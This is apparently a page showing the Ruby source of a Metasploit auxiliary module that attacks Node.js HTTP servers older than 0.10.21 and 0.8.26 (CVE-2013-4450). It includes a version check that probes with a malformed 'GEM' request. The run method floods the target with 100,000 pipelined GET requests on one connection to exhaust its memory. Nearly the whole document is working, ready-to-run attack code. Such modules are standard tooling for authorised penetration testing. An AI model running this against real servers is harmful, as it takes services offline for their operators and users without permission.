CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Node.js HTTP Pipelining Denial of Service',
13
      'Description'    => %q{
14
        This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
15
        released before 0.10.21 and 0.8.26. The attack sends many pipelined
16
        HTTP requests on a single connection, which causes unbounded memory
17
        allocation when the client does not read the responses.
18
      },
19
      'Author'         =>
20
        [
21
          'Marek Majkowski', # Vulnerability discovery
22
          'titanous',        # Metasploit module
23
          'joev'             # Metasploit module
24
        ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2013-4450' ],
29
          [ 'OSVDB', '98724' ],
30
          [ 'BID' , '63229' ],
31
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]
32
        ],
33
      'DisclosureDate' => '2013-10-18'))
34

35
    register_options(
36
      [
37
        Opt::RPORT(80),
38
        OptInt.new('RLIMIT', [true,  "Number of requests to send", 100000])
39
      ],
40
    self.class)
41
  end
42

43
  def check
44
    # http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/
45
    # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
46
    status = Exploit::CheckCode::Safe
47
    connect
48
    sock.put(http_request("GEM"))
49
    begin
50
      response = sock.get_once
51
      status = Exploit::CheckCode::Appears if response =~ /HTTP/
52
    rescue EOFError
53
      # checking against >= 0.10.17 raises EOFError because there is no
54
      # response to GEM requests
55
      vprint_error("Failed to determine the vulnerable state due to an EOFError (no response)")
56
      return Msf::Exploit::CheckCode::Unknown
57
    ensure
58
      disconnect
59
    end
60
    status
61
  end
62

63
  def host
64
      host = datastore['RHOST']
65
      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
66
      host
67
  end
68

69
  def http_request(method='GET')
70
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
71
  end
72

73
  def run
74
    payload = http_request
75
    begin
76
      print_status("Stressing the target memory...")
77
      connect
78
      datastore['RLIMIT'].times { sock.put(payload) }
79
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
80
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
81
      print_status("Unable to connect to #{host}.")
82
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
83
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
84
    ensure
85
      disconnect
86
    end
87
  end
88
end
89

90